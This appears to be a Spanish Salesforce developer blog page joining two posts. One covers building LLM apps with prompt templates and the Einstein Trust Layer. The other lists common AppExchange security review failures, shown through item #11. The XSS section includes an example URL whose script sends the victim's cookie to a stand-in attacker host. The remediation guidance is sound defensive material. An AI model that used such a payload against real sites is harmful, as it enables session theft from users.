Creación de aplicaciones impulsadas por IA con LLM y Einstein | Blog de desarrolladores de Salesforce

La IA generativa es la tecnología más transformadora desde Internet y revoluciona la forma en que creamos e interactuamos con la información. Para los desarrolladores, esto plantea nuevas preguntas: desde la práctica "¿Cómo puedo crear aplicaciones impulsadas por IA con modelos de lenguaje grandes (LLM)?" Más profundamente, “¿Cómo cambiará la IA generativa la naturaleza de las aplicaciones? ” Exploramos estas dos preguntas en esta publicación de blog.

¿Cómo creo aplicaciones impulsadas por IA con LLM?

Comencemos con la primera pregunta: "¿Cómo creo aplicaciones con LLM?" y explore tres opciones que comúnmente se consideran:

Entrena tu propio modelo
Personaliza un modelo de código abierto
Utilice modelos existentes a través de API

Entrena tu propio modelo

Entrenar su propio modelo le brinda control total sobre los datos de los que aprende su modelo. Por ejemplo, puede entrenar un modelo con datos específicos de su industria. Un modelo entrenado con datos de un dominio específico generalmente será más preciso que un modelo de propósito general para casos de uso centrados en ese dominio. Si bien entrenar su propio modelo ofrece más control y precisión, puede que no siempre sea el mejor enfoque. Aquí hay algunas cosas para considerar:

Tiempo y recursos: formar su propio LLM desde cero puede llevar semanas o incluso meses. Como punto de referencia, aunque es probable que su modelo sea mucho más pequeño, el modelo GPT-3 de OpenAI tardó 1,5 millones de horas de GPU en entrenarse.
Experiencia: para entrenar su modelo, también necesitará un equipo de ingenieros especializados en aprendizaje automático (ML) y procesamiento del lenguaje natural (NLP).
Seguridad de los datos: el poder de los LLM hace que sea tentador crear modelos que aprendan de todos sus datos, pero esto no siempre es lo correcto desde el punto de vista de la seguridad de los datos. Puede haber tensión entre la forma en que aprenden los LLM y la forma en que se implementan las políticas de seguridad de datos en su empresa. Los LLM aprenden de grandes cantidades de datos. ¡Cuantos más datos mejor! Sin embargo, con seguridad a nivel de campo (FLS) y permisos estrictos, las políticas de seguridad de datos corporativas a menudo se basan en el principio de privilegio mínimo: los usuarios solo deben tener acceso a los datos que necesitan para realizar su trabajo específico. ¡Cuantos menos datos mejor! Por lo tanto, un modelo formado con todos los datos disponibles de los clientes y puesto a disposición de todos en su empresa puede no ser una buena idea y violar las políticas de seguridad de datos de su empresa. Sin embargo, un modelo entrenado en especificaciones de productos y resoluciones de tickets de soporte anteriores puede ayudar a los agentes a resolver tickets nuevos sin comprometer la seguridad de los datos.

Personaliza un modelo de código abierto

Personalizar un modelo de código abierto normalmente lleva menos tiempo y es menos costoso que entrenar su propio modelo desde cero. Sin embargo, aún necesita un equipo de ingenieros especializados en aprendizaje automático (ML) y procesamiento del lenguaje natural (NLP). Dependiendo del caso de uso, es posible que aún experimentes la tensión de seguridad de los datos descrita anteriormente.

Utilice modelos existentes a través de API

Utilizar modelos existentes a través de API es la forma más sencilla de crear aplicaciones con LLM. Esta es también la opción más utilizada en este momento. Sin embargo, estos modelos no se han entrenado con los datos contextuales o privados de su empresa y, por lo tanto, el resultado que producen puede ser demasiado genérico para ser útil.

En esta publicación de blog, exploramos diferentes técnicas para agregar datos contextuales o privados de la empresa a través del mensaje. Debido a que el mensaje se crea dinámicamente en nombre del usuario, solo incluye datos a los que el usuario tiene acceso, lo que aborda la tensión de seguridad de los datos descrita anteriormente. Es posible que le preocupe pasar datos privados a una API de terceros, pero existen técnicas para abordar esa preocupación y también las describimos en esta publicación de blog.

Creación de aplicaciones impulsadas por IA utilizando modelos existentes a través de API

Llamada API básica

Los principales proveedores de modelos como OpenAPI , Anthropic , Google , Hugging Face y Cohere ofrecen API para trabajar con sus modelos. En la implementación más básica, su aplicación captura un mensaje del usuario, lo pasa como parte de la llamada API y muestra el resultado generado al usuario.

Por ejemplo, así es como se vería la llamada API usando la API OpenAI:

Esta opción puede funcionar para casos de uso simples que solo requieren un resultado general basado en conocimientos generales. Por ejemplo, " Escribe un haiku sobre el invierno" o "Escribe una declaración SQL de muestra con una unión externa". Pero si necesita una respuesta que se adapte a su propio contexto o a los datos privados de su empresa, es probable que el resultado generado sea demasiado genérico para ser útil.

Por ejemplo, digamos que un usuario ingresa el siguiente mensaje:

Escriba un correo electrónico de presentación para el director ejecutivo de Acme.

El correo electrónico generado no sería personalizado ni relevante porque el modelo no sabe nada sobre su relación con Acme y los negocios que ha hecho con ellos.

Puesta a tierra del LLM

Para que la respuesta sea más relevante y contextual, el usuario puede fundamentar el LLM con información adicional. Por ejemplo, pueden ingresar el siguiente mensaje:

Usted es John Smith, representante de cuentas de Northern Trail Outfitters.
Escriba un correo electrónico de presentación a Lisa Martinez, directora ejecutiva de ACME.
Aquí hay una lista de los últimos tres pedidos que Acme realizó a Northern Trail Outfitters:
Colección Verano 2023: $375,286
Colección Primavera 2023: $402,255
Colección Invierno 2022: $357,542

Esto permite que el LLM genere un resultado mucho más relevante. Sin embargo, este enfoque plantea dos problemas:

El usuario debe ingresar mucha información de conexión a tierra manualmente. Por lo tanto, la calidad del resultado depende en gran medida de la calidad de la pregunta ingresada por el usuario.
Está pasando información confidencial al proveedor del modelo donde potencialmente podría persistir o usarse para entrenar aún más el modelo, lo que significa que sus datos privados podrían aparecer en la respuesta generada por el modelo de otra persona.

Construcción rápida y puesta a tierra dinámica.

Para abordar la primera limitación anterior, puede construir el mensaje mediante programación. El usuario ingresa una cantidad mínima de información o simplemente hace clic en un botón en la aplicación y luego usted crea el mensaje mediante programación agregando datos relevantes. Por ejemplo, en respuesta a un clic en el botón “Escribir correo electrónico de introducción”, podría:

Llame a un servicio para obtener información sobre el usuario.
Llame a un servicio para obtener información sobre el contacto.
Llame a un servicio para obtener la lista de oportunidades recientes.
Construya el mensaje utilizando la información obtenida de los servicios de datos anteriores.

Así es como podrían verse estos pasos de construcción rápidos en Apex:

El principal inconveniente de este enfoque es que requiere un código personalizado para cada mensaje para poder realizar la sencilla tarea de fusionar datos dinámicos en texto estático.

Plantillas de aviso

Para facilitar la construcción del mensaje, podemos usar plantillas: un patrón de desarrollo de software bien conocido que se usa comúnmente para fusionar datos dinámicos en documentos estáticos. Con una plantilla, escribe un archivo de solicitud utilizando marcadores de posición que se reemplazan dinámicamente con datos dinámicos en tiempo de ejecución.

Así es como se vería el ejemplo de Apex anterior usando un lenguaje de plantilla genérico:

Eres {{ user.Name }}, {{user.Title}} en {{ user.CompanyName }}
Escriba un correo electrónico de presentación a {{ contact.Name }}, {{contact.Title}} en {{ contact.Account.Name }}
Estas son las oportunidades de {{contact.Account.Name}}:
{{#oportunidades}}
{{Nombre}}: {{Cantidad}}
{{/oportunidades}}

Las plantillas de mensajes no solo son útiles para crear mensajes mediante programación, sino que también se pueden utilizar como base para herramientas gráficas que admiten la creación de mensajes en un entorno de arrastrar y soltar.

Estudio rápido

Por eso creamos Prompt Studio, un nuevo creador de Salesforce que facilita la creación de indicaciones. Le permite crear plantillas de mensajes en un entorno gráfico y vincular campos de marcador de posición a datos dinámicos disponibles a través de datos de páginas de registro, un flujo, una nube de datos, una llamada de Apex o una llamada API. Una vez creada, se puede utilizar una plantilla de solicitud en diferentes lugares para consultar el modelo, incluidas las páginas de registro y el código Apex.

Capa de confianza de Einstein

Prompt Builder le permite definir mensajes basados dinámicamente en un entorno gráfico. Pero, ¿cómo se envía ese mensaje de forma segura a un proveedor de LLM?

Puede enviar el mensaje directamente a la API del proveedor de LLM, pero hay una serie de preguntas a considerar con ese enfoque:

¿Qué pasa con los problemas de cumplimiento y privacidad si pasa datos de información de identificación personal (PII) en el mensaje? ¿El proveedor del modelo podría conservar los datos de PII o incluso utilizarlos para entrenar aún más el modelo?
¿Cómo se evitan las alucinaciones, la toxicidad y los sesgos en los resultados generados por los LLM?
¿Cómo se rastrea y registra los pasos de creación de mensajes con fines de auditoría?

Si utiliza la API del proveedor de LLM directamente, tendrá que escribir un código personalizado para responder a estas preguntas. Hay muchas cosas a considerar y puede resultar difícil hacerlo bien para todos los casos de uso.

Ingrese a la capa de confianza de Einstein. Einstein Trust Layer le permite enviar solicitudes a LLM de forma confiable, abordando las inquietudes mencionadas anteriormente.

Así es como funciona:

En lugar de realizar llamadas API directas, utiliza LLM Gateway para acceder al modelo. LLM Gateway admite diferentes proveedores de modelos y abstrae las diferencias entre ellos. Incluso puedes conectar tu propio modelo.
Antes de enviar la solicitud al proveedor del modelo, pasa por una serie de pasos que incluyen el enmascaramiento de datos que reemplaza los datos PII con datos falsos para garantizar la privacidad y el cumplimiento de los datos.
Para proteger aún más sus datos, Salesforce tiene acuerdos de retención cero con proveedores de modelos, lo que significa que los proveedores de modelos no persistirán ni entrenarán más sus modelos con datos enviados desde Salesforce.
Cuando se recibe el resultado del modelo, pasa por otra serie de pasos, incluido el desenmascaramiento, la detección de toxicidad y el registro de seguimiento de auditoría. Demasking restaura los datos reales que fueron reemplazados por datos falsos por motivos de privacidad. La detección de toxicidad comprueba si hay contenido dañino u ofensivo en el resultado. El registro de seguimiento de auditoría registra todo el proceso con fines de auditoría.

De cara al futuro: creación de aplicaciones de una forma totalmente nueva

Ahora echemos un vistazo a lo que viene y abordemos la segunda pregunta planteada al principio de este artículo: ¿Cómo cambiará la IA generativa la naturaleza de las aplicaciones?

Encadenamiento rápido

La lógica involucrada en la creación de un mensaje a veces puede volverse compleja. Puede implicar múltiples llamadas a API o servicios de datos, como en el ejemplo de conexión a tierra dinámica anterior. Responder a la pregunta de un solo usuario puede incluso implicar varias llamadas al LLM. Esto se llama encadenamiento rápido. Considere el siguiente ejemplo:

Para construir el mensaje:

Realizamos una primera llamada API o servicio de datos para obtener datos contextuales de la empresa
Los datos que regresan de la primera llamada al servicio de datos se usan para crear un primer mensaje que usamos para consultar el LLM.
La salida del LLM se utiliza como entrada para una segunda llamada de servicio de datos.
Los datos que regresan de la segunda llamada al servicio de datos se utilizan para crear un segundo mensaje cuya respuesta se envía al usuario.

Las posibilidades de combinar llamadas de servicios de datos y llamadas de LLM para generar un resultado son infinitas.

Orquestación de IA

El enfoque descrito hasta ahora funciona bien, pero a medida que estos flujos de trabajo se vuelven más complejos, podemos ver la necesidad de alguna forma de orquestación. Como desarrollador, luego crearía una serie de bloques de construcción que realizan tareas granulares: recuperar datos sobre un cliente, actualizar un registro, realizar alguna lógica computacional, etc. Estos bloques de construcción se pueden orquestar o remezclar de diferentes maneras usando un herramienta de orquestación. Esto se podría hacer usando una herramienta de orquestación tradicional que le permita definir qué bloques de construcción usar, en qué orden y cuándo (con diferentes ramas "si"). Pero, ¿qué pasaría si la orquestación en sí estuviera impulsada por IA con un orquestador que pudiera razonar y elegir qué bloques de construcción usar y cómo componerlos para realizar una tarea específica? La orquestación impulsada por IA es un nuevo paradigma poderoso que tiene el potencial de revolucionar la forma en que interactuamos con los sistemas de IA y creamos aplicaciones.

El siguiente diagrama describe este nuevo paradigma de bloques de construcción orquestado por IA a un alto nivel.

En este diagrama, las acciones son los componentes básicos descritos anteriormente. Podrían ser acciones invocables de Apex, API de MuleSoft o indicaciones. Algunas acciones fundamentales están disponibles de forma predeterminada y otras serán desarrolladas por los desarrolladores. Esto también crea una oportunidad para un mercado de acciones creado por desarrolladores y socios.

El planificador es el orquestador impulsado por IA. Cuando la solicitud se pasa al tiempo de ejecución de la orquestación, el planificador elige (crea un plan para) qué acciones usar y cómo componerlas para responder mejor a la solicitud del usuario.

La orquestación de IA es un área activa de investigación en Salesforce y en la industria en su conjunto.

Resumen

El uso de modelos existentes a través de API es una forma común de crear aplicaciones impulsadas por IA con LLM. Con este enfoque, es necesario basar el modelo en datos privados o contextuales de la empresa para obtener resultados más relevantes y útiles. En lugar de pedirle al usuario que ingrese una gran cantidad de información básica manualmente, puede crear el mensaje mediante programación llamando a servicios de datos y agregando datos contextuales al mensaje. Prompt Studio es un nuevo creador de Salesforce que facilita la creación de mensajes al permitirle crear plantillas de mensajes en un entorno gráfico y vincular campos de marcador de posición a datos dinámicos. Einstein Trust Layer le permite enviar mensajes a las API de los proveedores de LLM de forma confiable, abordando problemas de privacidad, sesgos y toxicidad de los datos. La orquestación impulsada por la IA es un paradigma emergente que podría cambiar la forma en que interactuamos con los sistemas de IA y creamos aplicaciones.

Sobre el Autor

Christophe Coenraets es vicepresidente senior de Trailblazer Enablement en Salesforce. Es un desarrollador de corazón con más de 25 años de experiencia en la creación de aplicaciones empresariales, habilitando audiencias técnicas y asesorando a organizaciones de TI.

Obtenga las últimas publicaciones de blog y episodios de podcasts para desarrolladores de Salesforce a través de Slack o RSS.

Añadir a holgura Suscríbete a RSS

Seguir leyendo

admin administrador Administradores ai AMA apex Apex Code Apex invocable API apis Aplicaciones Aplicaciones empresariales Apps Arquitecto Arquitectos Aura Blogs CI cli Código abierto Código Apex Cómo Comunidad Conectar conexión Conocimiento consulta contacto Correo electrónico Costo cuenta Datos desarrollador desarrollador de salesforce Desarrolladores desarrolladores de Salesforce Desarrollo desarrollo de aplicaciones Dev EGA Futura Einstein Einstein para Desarrolladores Einstein Trust Layer Empresa flow flujo Flujos Force.com ga Genie Google Herramientas html IA generativa INCLUYE integración y API Investigación LLM Marca ML MuleSoft Negocio Negocios Nube Nube de datos Ohana Oportunidad PCI Pedido pionero Podcast Preguntas Proceso Product Producto productos Prompt Studio Prueba Quip Registro Respuesta REST Salesforce Salesforce.com seguridad Seguridad de datos Seguridad e identidad Slack Soporte sql Tarea Tecnología Tema Temas TI Trailblazer trust Tutoriales UI

Las 20 vulnerabilidades principales encontradas en la revisión de seguridad de AppExchange ☁️

El enlace a la publicación original, lo encontrarás al final de este artículo.

…

Las 20 principales vulnerabilidades encontradas en la revisión de seguridad de AppExchange | Blog de desarrolladores de Salesforce

Se sabe que la revisión de seguridad de AppExchange es uno de los procesos de revisión más rigurosos de cualquier mercado de aplicaciones en línea. Esta estricta reputación es algo de lo que Salesforce se enorgullece, siendo la confianza nuestro valor número uno. Como mercado de software empresarial, tenemos la profunda responsabilidad de cumplir con los más altos estándares de seguridad posibles para la protección de los datos de los clientes.

Dicho esto, estos estándares pueden representar un desafío importante para los socios ISV que buscan publicar ofertas en AppExchange. Para ayudar a mejorar la transparencia y ayudarlos a todos a tener éxito, en orden de prevalencia, esta publicación analizará las 20 razones principales por las que los socios no pasan la revisión de seguridad (a partir de 2023). También cubriremos cómo remediar o prevenir estos problemas.

#1 — Aplicación de CRUD/FLS

¿Qué es esto?

Las vulnerabilidades de aplicación de la seguridad a nivel de objetos y campos (CRUD/FLS) son la razón principal (por un margen significativo) para no pasar la revisión de seguridad de AppExchange. Estas vulnerabilidades representan fallas al verificar adecuadamente si los objetos y/o campos son accesibles, creables, eliminables y/o actualizables antes de ejecutar consultas o acciones de base de datos. Si su oferta de AppExchange contiene algún código de Salesforce, este problema debe ser su prioridad número uno a resolver antes de enviarlo para una revisión de seguridad.

¿Cómo puedo abordar esto?

Si, durante su proceso de codificación, no ha implementado consistentemente comprobaciones CRUD/FLS o no ha ejecutado SOQL, SOSL y DML en modo de usuario, querrá hacer una revisión muy exhaustiva de su código base para asegurarse de que no esté realizar cualquier operación de creación/lectura/actualización/eliminación no marcada en objetos o campos.

El método preferido y moderno para hacer cumplir CRUD/FLS implica utilizar el modo de usuario en todas las consultas y operaciones de bases de datos. La desventaja de esto es que Checkmarx, PMD y el motor de reglas PMD de Code Analyzer aún no lo admiten completamente (al momento de escribir esta publicación, PMD admite WITH USER_MODE en SOSL/SOQL, pero no el modo de usuario DML, por lo que si usa este tipo de protección arrojará falsos positivos). Code Analyzer Graph Engine es actualmente la única herramienta que admite ambos tipos de modos de usuario. Consulte el comando scanner:run:dfa en la documentación para ejecutar un escaneo con Code Analyzer Graph Engine.

Si ha estado aplicando CRUD/FLS a la antigua usanza con Schema.DescribeSObjectResult (es decir, métodos como isCreatable() , isUpdateable() , isDeletable() ), entonces Code Analyzer y la extensión PMD para VS Code pueden ser útiles herramientas que puede utilizar para comprobar su código base. Puede seguir nuestra guía para obtener más información sobre cómo utilizar PMD para VS Code y Code Analyzer para eliminar las infracciones CRUD/FLS.

El escáner Checkmarx debe utilizarse como verificación final de violaciones de CRUD/FLS. Puede ejecutar este análisis a través del Portal de seguridad para socios .

Obtenga más información sobre la aplicación de CRUD/FLS en Trailhead .

#2 – Versión de software insegura

¿Qué es esto?

Esto significa que alguna pieza de software (normalmente, una versión específica del software) utilizada en su oferta tiene vulnerabilidades de seguridad conocidas. La mayoría de las veces, es porque estás usando una versión desactualizada de una biblioteca de JavaScript (por ejemplo, jQuery es, con diferencia, la más común), pero también podría ser algo así como versiones antiguas de nginx, bibliotecas de Python, CKEditor o PHP.

¿Cómo puedo abordar esto?

Intente identificar todas las bibliotecas, marcos, software y otras tecnologías que no sean de Salesforce dentro del alcance de su oferta de AppExchange.

Busque cada uno de estos en Snyk (para proyectos de código abierto) o en la base de datos CVE . CVE significa "vulnerabilidades y exposiciones comunes" y la base de datos CVE representa un glosario de vulnerabilidades de seguridad conocidas públicamente que es mantenido y operado por el FFRDC Nacional de Ciberseguridad de EE. UU. y MITRE Corporation. También puede utilizar el complemento RetireJS de Salesforce Code Analyzer para ejecutar un escaneo de su código base empaquetado para buscar bibliotecas de JavaScript con vulnerabilidades conocidas.

Nota: En algunos casos, puede agregar documentación de falsos positivos para argumentar que un CVE particular registrado no podría aplicarse a su oferta, ya que quizás no esté utilizando la funcionalidad asociada con ese CVE.

#3 – Violación al compartir

¿Qué es esto?

Básicamente, esto significa que tiene clases de Apex en las que no ha agregado explícitamente la palabra clave with sharing al encabezado de la clase, omitiendo así las reglas de uso compartido de una organización.

¿Cómo puedo abordar esto?

Simplemente verifique todas sus clases de Apex y asegúrese de tener with sharing (o el uso compartido heredado) definido en el encabezado de la clase. Para los casos en los que necesita que una clase se ejecute sin compartir (por ejemplo, la clase debe ejecutarse en un contexto de sistema y no en un contexto de usuario), agregue una explicación a su documento de falso positivo que explique el caso de uso empresarial (e idealmente, agregue comentarios en la parte superior). de los encabezados de clase relevantes para que quede aún más claro).

Code Analyzer , PMD para VS Code y Checkmarx también pueden ayudarlo a escanear su código.

Obtenga más información sobre cómo compartir el cumplimiento a través de Trailhead .

#4: Almacenamiento inseguro de datos confidenciales

¿Qué es esto?

Los secretos no deben estar codificados en el código fuente. Aunque el código puede estar contenido en un paquete administrado donde el código está oculto para los clientes, todavía existen razones por las que esta es una práctica insegura, entre ellas:

El cliente debe tener control sobre sus secretos y claves y, en muchos casos, debe poder cambiarlos o actualizarlos.
Los secretos pueden quedar expuestos en registros o mensajes de error
Si un secreto o clave caduca, el cliente no podrá actualizarlo por sí mismo.

¿Cómo puedo abordar esto?

Asegúrese de que no haya secretos codificados en el código fuente, incluso si es un paquete administrado. Asegúrese de que todos los secretos se almacenen de una de las siguientes maneras:

Campos de metadatos personalizados protegidos (para secretos propiedad de socios)
Configuraciones personalizadas protegidas (para secretos propiedad del suscriptor/cliente)
Credenciales con nombre (esto generalmente no se recomienda, pero si tiene un caso de uso específico que lo requiera, es posible que se permita caso por caso)
Cifrado y almacenado en objetos personalizados con la clave de cifrado almacenada en una configuración personalizada protegida o en un campo de metadatos personalizados ocultos

Obtenga más información sobre el almacenamiento seguro de secretos en Trailhead .

#5 — Configuración TLS/SSL

¿Qué es esto?

Todas las conexiones entrantes y salientes que involucran a sus comunidades, sitios y portales de Salesforce deben utilizar Transport Layer Security (TLS) 1.2. Este requisito es válido en los modos Lightning Experience y Salesforce Classic para comunidades y sitios, independientemente de si están en las ediciones Essentials, Enterprise, Performance, Unlimited o Developer.

¿Cómo puedo abordar esto?

Verifique que el acceso a su navegador, las integraciones de API y otras funciones de Salesforce sean compatibles con TLS 1.2.

Una forma sencilla de hacerlo es utilizar Qualys SSL Scanner. El equipo de revisión de seguridad ejecutará este análisis en todos y cada uno de los puntos finales externos o que no sean de Salesforce involucrados en su solución. Si sus terminales no reciben una calificación A por cumplimiento de SSL/TLS, su revisión de seguridad no será aprobada.

Para ejecutar el escaneo, simplemente ingrese la URL base en el formulario web de prueba del servidor SSL de Qualys y presione Enviar.

Puede encontrar más detalles sobre los requisitos de TLS en las notas de la versión .

#6 — Información confidencial en depuración

¿Qué es esto?

Este tipo de vulnerabilidad describe situaciones en las que se filtra información confidencial, como secretos de aplicaciones, datos del sistema o información de depuración demasiado detallada, a través de funciones de registro u otros flujos de salida. Por lo general, esto sucede cuando el registro detallado está habilitado para fines de desarrollo, pero luego no se reduce adecuadamente antes de enviarlo para la revisión de seguridad de AppExchange.

¿Cómo puedo abordar esto?

En su paquete de Salesforce, asegúrese de buscar en su código fuente todas las declaraciones de depuración del paquete para asegurarse de que no registren información confidencial o secretos.

Asegúrese de que los códigos de error y los mensajes de error en toda su solución tengan un nivel de información apropiado para que todos los usuarios los vean. Por ejemplo, los usuarios habituales generalmente no deberían ver seguimientos de pila completos ni información de depuración detallada. De manera similar, asegúrese de que otras funciones de registro o flujos de salida tampoco filtren datos confidenciales.

Code Analyzer y PMD para VS Code pueden ayudarlo a detectar estos problemas en las aplicaciones de Salesforce, y los escáneres de aplicaciones web como Burp Suite , Chimera u OWASP ZAP también pueden ayudarlo a detectar estos problemas en sus integraciones externas y aplicaciones web.

Obtenga más información sobre cómo verificar los seguimientos de la pila e información detallada sobre las excepciones en el número 13.

#7 – CSRF

¿Qué es esto?

La falsificación de solicitudes entre sitios (CSRF) es un tipo de ataque que engaña a una víctima para que ejecute acciones no deseadas en una aplicación web en la que está autenticada. Explotar la confianza que un sitio tiene en el navegador del usuario puede llevar a acciones potencialmente dañinas, como cambiar direcciones de correo electrónico y contraseñas, o incluso realizar transacciones sin el conocimiento o consentimiento del usuario.

En la plataforma Salesforce, existe un token anti-CSRF para contrarrestar dichos ataques, que ofrece protección mientras se utilizan controladores y métodos estándar. Sin embargo, los desarrolladores pueden eludir involuntariamente estas salvaguardas anti-CSRF al crear sus propios métodos de acción.

¿Cómo puedo abordar esto?

En general, las aplicaciones web pueden prevenir ataques CSRF principalmente implementando tokens anti-CSRF, que son valores únicos y específicos del usuario incluidos en cada solicitud de cambio de estado para verificar la fuente. Además, deben adoptar la práctica de cookies del mismo sitio, que impide que el navegador envíe la cookie junto con solicitudes entre sitios, mitigando así los riesgos de CSRF.

Para páginas de Visualforce:

Al crear páginas de Visualforce, evite utilizar solicitudes HTTP GET que cambien de estado; use POST o PUT para cambios de estado en su lugar
No ejecute acciones automáticas ni cambie el estado (por ejemplo, operaciones DML) al cargar la página.
Otra técnica de mitigación implica agregar una página de confirmación intermedia antes de realizar la acción, donde el usuario puede confirmar que tenía la intención de realizar esa acción.

Para componentes Lightning:

De manera similar a las páginas de Visualforce, evite cambiar el estado o ejecutar acciones al cargar un componente Lightning, mediante enlaces como init (para Aura) ,connectedCallback , renderedCallback o constructor .

Al realizar llamadas API:

Para las API que no son de Salesforce, es posible que también desee agregar su propio token CSRF.

CSRF es uno de los tipos de problemas de seguridad más complicados, por lo que vale la pena invertir en aprender más sobre él en profundidad. Para los paquetes de Salesforce, existe excelente documentación para desarrolladores y un módulo Trailhead como referencia.

Para otros tipos de aplicaciones web, es posible que desees consultar la documentación de OWASP .

Los escáneres de aplicaciones web, como Burp Suite , Chimera u OWASP ZAP , también pueden ayudarle a detectar estos problemas en sus aplicaciones web externas.

N.º 8: secuencias de comandos entre sitios (XSS) almacenadas y reflejadas

¿Qué es esto?

Los ataques de secuencias de comandos entre sitios (XSS) son problemas de inyección en los que se insertan secuencias de comandos dañinas en sitios web confiables. Ocurren cuando un atacante explota una aplicación web para enviar código malicioso, a menudo un script del lado del cliente, a un usuario diferente. Estos ataques explotan fallas en aplicaciones web que utilizan entradas de usuario no validadas o codificadas en su salida.

En un ataque XSS, el navegador de un usuario desprevenido ejecuta el script malicioso, creyendo que proviene de una fuente confiable. Esto permite que el script acceda a cookies, tokens de sesión u otros datos confidenciales almacenados en el navegador. Incluso puede modificar el contenido HTML de la página.

Los ataques XSS almacenados son de tipo persistente, en los que la aplicación web almacena la entrada maliciosa y luego se muestra a los usuarios. Los ataques XSS reflejados, por otro lado, generalmente ocurren cuando se inyecta código malicioso en una URL, que se ejecuta cuando un usuario hace clic en ella (por ejemplo: http://example.com/search?query=<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie;</script> ).

Los motivos por los que su aplicación podría ser susceptible incluyen:

Entrada no validada : las aplicaciones pueden aceptar entradas del usuario y usarlas o mostrarlas en una página sin validarlas adecuadamente (para garantizar que no contenga código/scripts ejecutables).
Campos de texto enriquecido : almacenar entradas en campos RTF de Salesforce es riesgoso porque admiten contenido HTML, por lo que debe validar la entrada para evitar que se almacenen XSS.
Páginas de Visualforce : pueden ser susceptibles si utilizan entradas generadas por el usuario en el cuerpo HTML o en JavaScript sin un escape de entrada o codificación de salida adecuados.
Componentes web Aura y Lightning (LWC) : aunque tienen protecciones integradas contra XSS, los desarrolladores pueden evitar estas protecciones mediante cosas como el uso de la propiedad innerHTML , lwc:dom=”manual” o el componente lightning:formattedRichText sin la validación de entrada adecuada.
Parámetros de URL : las aplicaciones pueden usarlos directamente en el HTML o JavaScript de una página sin validación (lo que lleva a XSS reflejado).

¿Cómo puedo abordar esto?

Su objetivo principal debe ser evitar la manipulación de DOM, pero también recomendamos practicar el filtrado de entrada y la codificación de salida, que incluyen:

Evite la manipulación del modelo de objetos de documento (DOM): en su lugar, utilice técnicas como directivas de plantilla y evite funciones de JavaScript potencialmente inseguras (por ejemplo, eval() , DOMParser.parseFromString() , Document.implementation.createHTMLDocument() , setTimeout() , setInterval() )
Filtrado de entrada: asegúrese de que la entrada del usuario no contenga código ejecutable mediante el uso de expresiones regulares y listas de bloqueo o listas de permitidos (por ejemplo, filtre los caracteres comúnmente utilizados en el código, como '<', '>', comillas simples o dobles, ' /', ';', corchetes, paréntesis u operadores matemáticos o lógicos como '+', '&' o '-')
Codificación de salida : asegúrese de que si el código ejecutable pasara el filtrado de entrada, no se interprete como código al convertir caracteres "peligrosos" en versiones de texto inofensivas (por ejemplo, '&; debe convertirse a & y '<' o '>' debe convertirse a < y >)

Este módulo de Trailhead explica exactamente cómo mitigar XSS con estas técnicas, y nuestra documentación para desarrolladores también es útil aquí. Para obtener consejos específicos sobre la protección contra XSS en componentes Lightning, consulte la página Seguridad Lightning en la Guía de codificación segura.

Para aplicaciones web que no son de Salesforce, también puede consultar la documentación de OWASP para obtener consejos adicionales.

Los escáneres de aplicaciones web, como Burp Suite , Chimera u OWASP ZAP , también pueden ayudarle a detectar estos problemas.

#9: JavaScript no está en recursos estáticos

¿Qué es esto?

Muchos paquetes administrados por Salesforce no pasan la revisión de seguridad por no almacenar JavaScript como recursos estáticos en sus paquetes y, en su lugar, se vinculan a archivos JavaScript alojados externamente con etiquetas <script> . La razón principal de esta regla es que permite un control de versiones mucho más seguro y garantiza la integridad de los archivos JavaScript en su paquete de Salesforce incluso si la fuente externa está comprometida.

¿Cómo puedo abordar esto?

Nuestra regla es que todos los recursos de script y estilo deben agregarse al paquete como recursos estáticos y luego cargarse con una etiqueta <apex:includeScript> en su página (para Visualforce) o un ltng:require en su .cmp o .app. marcado (para Aura).

Nota: Si tiene un LWC, defina los módulos JavaScript que importe a su componente o use la función loadScript para cargar un archivo JavaScript de recursos estáticos.

Para paquetes que no son LWC, la mejor manera de verificar este problema es buscar manualmente su código fuente para asegurarse de que todas las bibliotecas de JavaScript estén almacenadas como recursos estáticos, no cargadas dinámicamente a través de hipervínculos.

Para situaciones en las que esto no sea factible, recomendamos programar una cita en horario de oficina técnica para analizar su caso de uso. Es posible obtener una excepción en ciertos casos.

Obtenga más información sobre este problema en nuestra documentación para desarrolladores .

#10 – Inyección SOQL

¿Qué es esto?

La inyección SOQL es la versión específica de Salesforce de la inyección SQL. Ocurre cuando una entrada no validada proporcionada por el usuario se inserta directamente en una consulta SOQL dinámica. Si la entrada no está validada, puede incluir comandos SOQL que modifican efectivamente la declaración SOQL y engañan a la aplicación para que ejecute comandos no deseados.

¿Cómo puedo abordar esto?

La forma más sencilla de evitar el problema es evitar consultas dinámicas en favor de consultas estáticas y utilizar variables vinculantes. De lo contrario, deberá validar estrictamente las entradas del usuario antes de usarlas en consultas mediante técnicas como encasillamiento, lista blanca de entradas o escape.

Code Analyzer , PMD para VS Code y Checkmarx también pueden ayudarlo a escanear su código.

Para obtener más información, consulte nuestro módulo Trailhead o revise nuestra documentación para desarrolladores .

Para aplicaciones que no son de Salesforce, es posible que desee obtener más información sobre la inyección SQL en la guía OWASP . Los escáneres de aplicaciones web, como Burp Suite , Chimera u OWASP ZAP , también pueden ayudar a identificar problemas de inyección SQL.

#11 — Lightning: carga CSS inadecuada

¿Qué es esto?

Similar al problema de usar etiquetas <script> o <link> para cargar JavaScript en sus paquetes, usar etiquetas <link> o <style> para cargar CSS en lugar de <apex:stylesheet> (Visualforce) o <ltng:require> ( Aura) se considera una práctica insegura. Estas etiquetas <link> y <style> pueden hacer referencia a recursos externos o en línea que contienen CSS o JavaScript, y la arquitectura de seguridad Lightning Web Security (LWS) de Salesforce no los controla ni los desinfecta.

Para los componentes de Aura, en particular, el uso de <ltng:require> también permite a Salesforce aplicar correctamente las reglas de seguridad LWS y garantizar que el CSS que está cargando esté correctamente aislado y no incluya código o estilos JavaScript no seguros que puedan afectar negativamente a otros. partes de su aplicación Salesforce.

¿Cómo puedo abordar esto?

Para hacer referencia a un recurso CSS externo que haya subido como recurso estático, use una etiqueta <apex:stylesheet> en su página (para Visualforce) o una etiqueta <ltng:require> en su marcado .cmp o .app (para Aura ). Busque el código fuente de su paquete para asegurarse de que no haya utilizado etiquetas <link> o <style> en ningún lugar para cargar recursos CSS.

Nota: Si tiene una LWC, no puede encontrarse con este problema de todos modos porque, al igual que las etiquetas <script> , las etiquetas <style> ya están bloqueadas para su uso dentro de las plantillas HTML. En su lugar, incluiría su CSS en el archivo CSS asociado de su componente o usaría la función loadStyle para cargar un archivo CSS de recursos estáticos.

Puede encontrar más información en nuestra documentación para desarrolladores .

